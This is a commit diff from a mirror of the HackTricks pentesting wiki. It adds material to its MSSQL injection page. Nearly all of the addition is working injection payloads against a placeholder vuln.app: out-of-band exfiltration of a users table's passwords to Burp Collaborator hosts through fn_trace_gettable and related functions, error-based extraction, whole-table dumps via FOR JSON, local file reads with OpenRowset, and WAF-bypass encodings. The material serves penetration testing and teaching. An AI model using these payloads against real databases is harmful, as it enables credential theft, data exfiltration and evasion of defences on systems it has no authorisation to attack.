Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 04:33:28 +00:00
Code Issues Projects Releases Packages Wiki Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2020-12-04 10:15:48 +00:00 committed by gitbook-bot
parent 47c2a669bf
commit ae33afb486
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 132 additions and 4 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

136
pentesting-web/sql-injection/mssql-injection.md
View file

@ -15,15 +15,63 @@ def get_sid(n):
return f"{domain}{user}" #if n=1000, get SID of the user with ID 1000
```
## SSRF
## **Alternative Error-Based vectors**
#### fn\_trace\_gettabl
**\(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**\)** Error-based SQL injections typically resemble constructions such as «+AND+1=@@version» and variants based on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of specific function calls that trigger a data type conversion error on sought-after data.
Some examples of such functions:
* `SUSER_NAME()`
* `USER_NAME()`
* `PERMISSIONS()`
* `DB_NAME()`
* `FILE_NAME()`
* `TYPE_NAME()`
* `COL_NAME()`
Example use of function `USER_NAME()`:
```text
1 and exists(select * from fn_trace_gettable('\\'+(select pass from users where id=1)+'.subdomain.burpcollaborator.net\1.trc',default))
https://vuln.app/getItem?id=1'%2buser_name(@@version)--
```
![](../../.gitbook/assets/image%20%28375%29.png)
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/6.png)
## SSRF
#### fn\_trace\_gettabe, fn\_xe\_file\_target\_read\_file, fn\_get\_audit\_file \(from [here](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)\)
`fn_xe_file_target_read_file()` example:
```text
https://vuln.app/getItem?id= 1+and+exists(select+*+from+fn_xe_file_target_read_file('C:\*.xel','\\'%2b(select+pass+from+users+where+id=1)%2b'.064edw6l0h153w39ricodvyzuq0ood.burpcollaborator.net\1.xem',null,null))
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/3.png)
**Permissions:** Requires VIEW SERVER STATE permission on the server.
`fn_get_audit_file()` example:
```text
https://vuln.app/getItem?id= 1%2b(select+1+where+exists(select+*+from+fn_get_audit_file('\\'%2b(select+pass+from+users+where+id=1)%2b'.x53bct5ize022t26qfblcsxwtnzhn6.burpcollaborator.net\',default,default)))
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/2.png)
**Permissions:** Requires the CONTROL SERVER permission.
`fn_trace_gettable()` example:
```text
https://vuln.app/ getItem?id=1+and+exists(select+*+from+fn_trace_gettable('\\'%2b(select+pass+from+users+where+id=1)%2b'.ng71njg8a4bsdjdw15mbni8m4da6yv.burpcollaborator.net\1.trc',default))
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/1.png)
**Permissions:** Requires the CONTROL SERVER permission.
**Information taken from** [**https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/\#MSSQL**](https://ibreak.software/2020/06/using-sql-injection-to-perform-ssrf-xspa-attacks/#MSSQL)\*\*\*\*
@ -127,3 +175,83 @@ SELECT dbo.http(@url);
![](https://ibreak.software/img/using-sql-injection-to-perform-ssrf-xspa-attacks/15.png)
## **Quick exploitation: Retrieve an entire table in one query**
**\(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**\)** There exist two simple ways to retrieve the entire contents of a table in one query — the use of the FOR XML or the FOR JSON clause. The FOR XML clause requires a specified mode such as «raw», so in terms of brevity FOR JSON outperforms it.
The query to retrieve the schema, tables and columns from the current database:
```text
https://vuln.app/getItem?id=-1'+union+select+null,concat_ws(0x3a,table_schema,table_name,column_name),null+from+information_schema.columns+for+json+auto--
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/5.png)
Error-based vectors need an alias or a name, since the output of expressions without either cannot be formatted as JSON.
```text
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/7.png)
## **Reading local files**
**\(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**\)** An example of retrieving a local file `C:\Windows\win.ini` using the function OpenRowset\(\):
```text
https://vuln.app/getItem?id=-1+union+select+null,(select+x+from+OpenRowset(BULK+C:\Windows\win.ini,SINGLE_CLOB)+R(x)),null,null
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/8.png)
Error-based vector:
```text
https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\win.ini',SINGLE_CLOB)+R(x))--
```
**Permissions:** The BULK option requires the ADMINISTER BULK OPERATIONS or the ADMINISTER DATABASE BULK OPERATIONS permission.
## **Retrieving the current query**
**\(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**\)** The current SQL query being executed can be retrieved from access `sys.dm_exec_requests` and `sys.dm_exec_sql_text`:
```text
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
```
![](https://swarm.ptsecurity.com/wp-content/uploads/2020/11/9.png)
**Permissions:** If the user has VIEW SERVER STATE permission on the server, the user will see all executing sessions on the instance of SQL Server; otherwise, the user will see only the current session.
## **Little tricks for WAF bypasses**
**\(From** [**here**](https://swarm.ptsecurity.com/advanced-mssql-injection-tricks/)**\)** Non-standard whitespace characters: %C2%85 или %C2%A0:
```text
https://vuln.app/getItem?id=1%C2%85union%C2%85select%C2%A0null,@@version,null--
```
Scientific \(0e\) and hex \(0x\) notation for obfuscating UNION:
```text
https://vuln.app/getItem?id=0eunion+select+null,@@version,null--
https://vuln.app/getItem?id=0xunion+select+null,@@version,null--
```
A period instead of a whitespace between FROM and a column name:
```text
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
```
\N seperator between SELECT and a throwaway column:
```text
https://vuln.app/getItem?id=0xunion+select\Nnull,@@version,null+from+users--
```